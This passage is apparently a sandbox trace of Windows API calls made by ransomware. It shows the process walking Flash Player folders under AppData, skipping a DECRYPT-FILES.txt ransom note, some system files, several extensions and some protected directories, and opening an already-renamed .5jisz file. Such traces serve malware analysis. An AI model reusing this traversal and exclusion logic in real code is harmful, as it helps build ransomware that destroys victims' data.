nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.441] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.441] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.441] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeadace0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.441] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.441] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.441] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.441] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.441] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.442] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0180.442] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.442] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0180.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\0a16c9.tmp" [0180.442] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.442] CloseHandle (hObject=0x0) returned 0 [0180.442] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.442] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.442] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.442] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4f0d00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4f0d00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 1 [0180.442] lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0180.442] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0180.442] lstrcatW (in: lpString1="sys", lpString2="\\" | out: lpString1="sys\\") returned="sys\\" [0180.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="sys\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0180.442] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Program Files") returned 0x0 [0180.442] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch=":\\Windows") returned 0x0 [0180.442] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Games\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\All Users") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="AhnLab") returned 0x0 [0180.443] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.443] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0180.443] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.443] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\0a16c9.tmp") returned 120 [0180.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x28c [0180.443] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0180.443] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.443] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\DECRYPT-FILES.txt") returned 127 [0180.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0180.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0180.444] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a38 [0180.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.447] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.447] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.447] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeadace0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.447] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.447] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.447] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.447] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.447] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.447] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0180.447] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.447] lstrcpyW (in: lpString1=0x36fdb74, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0180.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\0a16c9.tmp" [0180.447] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.448] CloseHandle (hObject=0x0) returned 0 [0180.448] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.448] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4caba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4caba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.448] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.448] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol.5jisz", cAlternateFileName="SETTIN~1.5JI")) returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="DECRYPT-FILES.txt") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="autorun.inf") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="boot.ini") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="desktop.ini") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="ntuser.dat") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="iconcache.db") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="bootsect.bak") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="ntuser.dat.log") returned 1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="thumbs.db") returned -1 [0180.448] lstrcmpiW (lpString1="settings.sol.5jisz", lpString2="Bootfont.bin") returned 1 [0180.448] lstrlenW (lpString="settings.sol.5jisz") returned 18 [0180.448] lstrcmpiW (lpString1="5jisz", lpString2="lnk") returned -1 [0180.448] lstrcmpiW (lpString1="5jisz", lpString2="exe") returned -1 [0180.448] lstrcmpiW (lpString1="5jisz", lpString2="sys") returned -1 [0180.448] lstrcmpiW (lpString1="5jisz", lpString2="dll") returned -1 [0180.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0180.448] lstrlenW (lpString="settings.sol.5jisz") returned 18 [0180.448] lstrcpyW (in: lpString1=0x36fdb74, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0180.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="settings.sol.5jisz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz" [0180.448] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x294 [0180.450] GetFileSizeEx (in: hFile=0x294, lpFileSize=0x36fd340 | out: lpFileSize=0x36fd340*=734) returned 1 [0180.450] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x298 [0180.450] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.450] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.450] CloseHandle (hObject=0x298) returned 1 [0180.451] CloseHandle (hObject=0x294) returned 1 [0180.451] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.451] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol.5jisz", cAlternateFileName="SETTIN~1.5JI")) returned 0 [0180.451] FindClose (in: hFindFile=0x479a38 | out: hFindFile=0x479a38) returned 1 [0180.451] CloseHandle (hObject=0x28c) returned 1 [0180.451] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4f0d00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4f0d00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sys\\", cAlternateFileName="")) returned 0 [0180.451] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.451] CloseHandle (hObject=0x284) returned 1 [0180.451] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashplayer\\", cAlternateFileName="FLASHP~1")) returned 0 [0180.451] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.451] CloseHandle (hObject=0x27c) returned 1 [0180.451] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="support\\", cAlternateFileName="")) returned 0 [0180.451] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.451] CloseHandle (hObject=0x274) returned 1 [0180.452] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="macromedia.com\\", cAlternateFileName="MACROM~1.COM")) returned 0 [0180.452] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.452] CloseHandle (hObject=0x26c) returned 1 [0180.452] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player\\", cAlternateFileName="FLASHP~1")) returned 0 [0180.452] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0180.452] CloseHandle (hObject=0x264) returned 1 [0180.453] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0180.453] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0180.453] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0180.453] lstrcatW (in: lpString1="Microsoft", lpString2="\\" | out: lpString1="Microsoft\\") returned="Microsoft\\" [0180.453] 